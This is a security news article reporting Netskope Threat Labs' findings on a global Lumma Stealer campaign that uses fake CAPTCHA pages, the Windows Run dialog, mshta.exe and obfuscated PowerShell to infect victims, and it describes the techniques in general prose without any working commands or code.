In a recent discovery made by Netskope Threat Labs, a sophisticated global malware campaign was unveiled, showcasing the use of fake CAPTCHA pages to distribute the Lumma Stealer malware. Lumma Stealer, a malware-as-a-service (MaaS) tool that has been active since at least 2022, is designed to stealthily extract sensitive information from infected systems.
The scope of this campaign extends across various countries, including Argentina, Colombia, the United States, and the Philippines, with the most affected industry sector being telecommunications. Other industries targeted by this malicious campaign include healthcare, banking, and marketing.
The perpetrators behind this campaign utilize a range of delivery methods to deploy the Lumma Stealer malware, including cracked software, Discord’s Content Delivery Network (CDN), and fraudulent CAPTCHA pages. To avoid detection, the attackers employ advanced techniques such as process hollowing and PowerShell one-liners.
Further analysis conducted by researchers has uncovered new payloads, websites utilizing malvertising tactics, and the integration of open-source tools to circumvent security measures. The utilization of these tools and tactics illustrates the sophistication and adaptability of the malicious actors behind the Lumma Stealer campaign.
The infection chain begins when unsuspecting victims are redirected to a fake CAPTCHA page and instructed to perform specific actions outside the context of their web browser. This process involves tasks like opening the Windows Run dialog, pasting clipboard content, and executing it, which triggers the download and execution of malicious code on the victim’s machine.
By requiring user interaction outside the browser, this method effectively bypasses traditional browser-based cybersecurity defenses. The fake CAPTCHA mechanism leverages JavaScript to inject a malicious command into the clipboard, which then exploits the legitimate Windows tool mshta.exe to download and execute malicious files from remote servers.
The malicious payloads downloaded may appear as benign file types but contain malicious JavaScript snippets that use PowerShell to decode base64-encoded data and execute further stages of the malware. The second stage of this attack involves a complex obfuscated PowerShell script that performs various operations, ultimately leading to the execution of the final payload—a PE file containing the Lumma Stealer malware.
To evade detection, the attackers employ techniques such as bypassing Windows Antimalware Scan Interface (AMSI) protections and utilizing tools like Babel for obfuscation. Additionally, the Lumma Stealer campaign has demonstrated adaptability by incorporating diverse delivery methods and evasion techniques, presenting significant challenges for cybersecurity defenses.
As this malicious campaign evolves within the MaaS ecosystem, the ability of the Lumma Stealer malware to exploit user interactions and abuse trusted system binaries underscores the importance of robust cybersecurity measures. The integration of application security into CI/CD workflows becomes crucial in countering such threats and enhancing overall defense capabilities against sophisticated malware attacks.